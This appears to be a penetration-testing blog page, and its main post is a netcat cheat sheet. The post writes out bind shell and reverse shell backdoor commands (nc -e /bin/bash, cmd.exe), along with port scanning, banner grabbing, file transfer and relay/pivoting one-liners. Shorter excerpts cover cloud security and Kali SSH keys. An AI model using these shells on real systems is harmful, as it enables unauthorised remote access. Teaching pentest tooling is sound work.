Security Testing for entities hosted in cloud

For the applications that are getting migrated to cloud / planned to be hosted in the cloud will need additional security considerations. Failure to ensure proper security protection when using cloud services may potentially result in higher costs and loss to business. Organizations must consider security controls for different services viz. Infrastructures as a service(Iaas), Software as a service (SaaS) or Platform as a service. Which applications should be moved to cloud?     ·         Low to Medium Risk What are the key security risks while hosting in cloud?     ·         Isolation Failure – Multi tenancy is a key thing in cloud. Failure in controls that separate the storage, memory, identity and access control and routing between tenants is a huge risk.     ·         Authentication and Authorization     ·...
Post a Comment

NETCAT (nc)

NETCAT (nc) is also known as the Swiss Army knife for a Penetration Tester. This is used to read from and write to network connections over TCP and UDP.
It is very dependable and is often used to start a listener for a reverse shell. It is feature rich and can be used for the following and many more…

1] Chat between two systems
Start listener on local machinenc -nlvp [port]
Connect to the listener from another machine
nc -nv [TargetIPAddress] [Port]
Once the connection is established the Chat can go on

2] Backdoor
Bind Shell: To create a shell on local port that can then be accessed using basic nc client
[a] Linuxnc -nlvp [localport] -e /bin/bash
[b] Windowsc:\> nc -nlvp [localport] -e cmd.exe
Reverse Shell: TO create a reverse shell that will attepmt to connect to your ip address on local port. This shell can then be captured using a nc listener.
[a] Linuxnc -nv [youripaddress] [port] -e /bin/bash
[b] Windowsc:\> nc -nv [youripaddress] [port] -e cmd.exe
Reverse shells are pretty usefull when dealing with firewalls that might prevent incoming connections.



3] Banner grabbing (TCP service) – Pretty useful if you do not have nmap installed on an pwn3d linux box from where you are trying to penetrate further.
linux:
echo “” | nc -nv -w1 [target ip address] [start port] – [end port]

4] Port scanning
Linux:nc -nv -z -w1 [Target IP Address] [start Port] – [End Port]

5] File Transfers
[a] Push a file from client to listener (acting as nc server):
nc -nlvp [localport] > [outfile] (Starting the nc server to listen on local port and store results in outfile)
nc -w3 [targetIP Address] [Port]
[Outfile] (Connecting to [TargetIPAddress] on [Port] and retrive [outfile])

6] Relays

Linux:

Create a FIFO (named pipe) called backpipe

cd /tmp
mknod backpipe p

[a] Listener to Client Relay
Create a relay that sends packets from the localport to a nc client

nc -nlvp [LocalPort] 0<backpipe | nc [TargetIPAddress] [Port] | tee backpipe
from the nc client:
nc -nv [TargetIPAddress] [Port]
[b] Listener to Listener Relay

Create a relay that sends packets from any connection on [LocalPort_1] to any connection on [Localport_2]

nc -nlvp [Localport_1] 0<backpipe | nc -nlvp [Localport_2] | tee backpipe
[c] Client to client Relay

Create a relay that sends the packets from the connection to [PreviousHopIPaddress] on [port1] to a Netcat client connected to [NextHopIPaddress] on [port2]

nc [PreviousHopIPaddress] [Port1] 0<backpipe |nc [NextHopIPaddress] [Port2] | tee backpipe


Windows:

Enter a temporary directory where we will create .bat files

c:\> cd c:\temp

[a] Listener to Client Relay:

Create a Relay that sends packets from the local port to a nc client connected to the [TargetIPaddress] on [Port]

c:\> echo nc [TargetIPaddress] [Port] > relay.bat
[b] Listener to Listener Relay

Create a relay that will send packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]

c:\> echo nc -nlvp [LocalPot_2] > relay.bat

c:\> nc -nlvp [Localport_1] -e relay.bat

[c] Client to client Relay
Create a relay that will send packets from the connection to [PreviousHopIPaddress] on [Port1] to a nc client connected to [NextHopIPaddress] on [Port2]

c:\> echo nc [NextHopIPaddress] [Port2] > relay.bat

c:\> nc [PreviousHopIPaddress] [Port1] -e relay.bat

c:\> nc -nlvp [Localport] -e relay.bat
 References: wikipedia, SANS, Offensive security
www.sans.org/security-

Whoa! That's a lot that we can get done with netcat isn’t it? Yes. However, there are certain limitations of netcat.
The basic fact that nc does not provide Authentication and Encryption for the incoming and outgoing traffic can be a major drawback.
In order to over come these limitations we can use Ncat and sbd.
Most of the above mentioned Tasks can be achieved with Ncat and sbd + added advantage of encryption => Thus ensuring secure traffic.
More on that later. When? I do not know at this point, however i promise to get to that as soon as I find time.

Comments

Post a Comment

Popular posts from this blog

Change the default SSH keys in Kali Linux ......One important step post installation

All of know that we can authenticate to a box without password if you have the SSH keys. The Kali images have known ssh keys and must be changed.  Here is how you can do this:  Move the default Kali ssh keys to a new folder: cd /etc/ssh/ mkdir default_kali_keys mv ssh_host_* default_kali_keys/ This will move your default keys to the new folder... Regenerate the keys: dpkg-reconfigure openssh-server Creating SSH2 RSA key; this may take some time ... Creating SSH2 DSA key; this may take some time ... Creating SSH2 ECDSA key; this may take some time ... insserv: warning: current start runlevel(s) (empty) of script `ssh' overrides LSB defaults (2 3 4 5). insserv: warning: current stop runlevel(s) (2 3 4 5) of script `ssh' overrides LSB defaults (empty). Verify ssh key hashes are different: md5sum ssh_host_* Compare new key hashes to the hashes below) cd default_kali_keys/ md5sum * b9419ea3a8fff086c258740e89ca86b8 ssh_host_dsa_key f9a5b57d7004e3740d07c5b037d15730 ssh_host_dsa_key.p...
Read more

Security Testing for entities hosted in cloud

For the applications that are getting migrated to cloud / planned to be hosted in the cloud will need additional security considerations. Failure to ensure proper security protection when using cloud services may potentially result in higher costs and loss to business. Organizations must consider security controls for different services viz. Infrastructures as a service(Iaas), Software as a service (SaaS) or Platform as a service. Which applications should be moved to cloud?     ·         Low to Medium Risk What are the key security risks while hosting in cloud?     ·         Isolation Failure – Multi tenancy is a key thing in cloud. Failure in controls that separate the storage, memory, identity and access control and routing between tenants is a huge risk.     ·         Authentication and Authorization     ·...
Read more

Keeping logs of your console commands during pentesting

Image
While it is very important to keep the screenshots and the results of your tools logged and recorded correctly, consistently and extensively, it is equally important to keep your console logs. This is very helpful when you are done with your penetration test and recall later during the results analysis / report writing that - what was the result of 'that' command I ran??? It is very commonly missed out by most pentesters - at least the beginners. While there are many ways in which you can do this: 1] copy paste the console logs and save it in your fav text editor 2] use a systematic approach I am sure method [1] is known to all :) Let's learn method [2] - Use script yes there is in inbuilt tool / script in linux that you can make use of: script usage: script filename.log This will start a process and it will keep logging the console output to this file. Once you are done just 'exit' Not to mention that care must be taken that you do not exit this process in between ...
Read more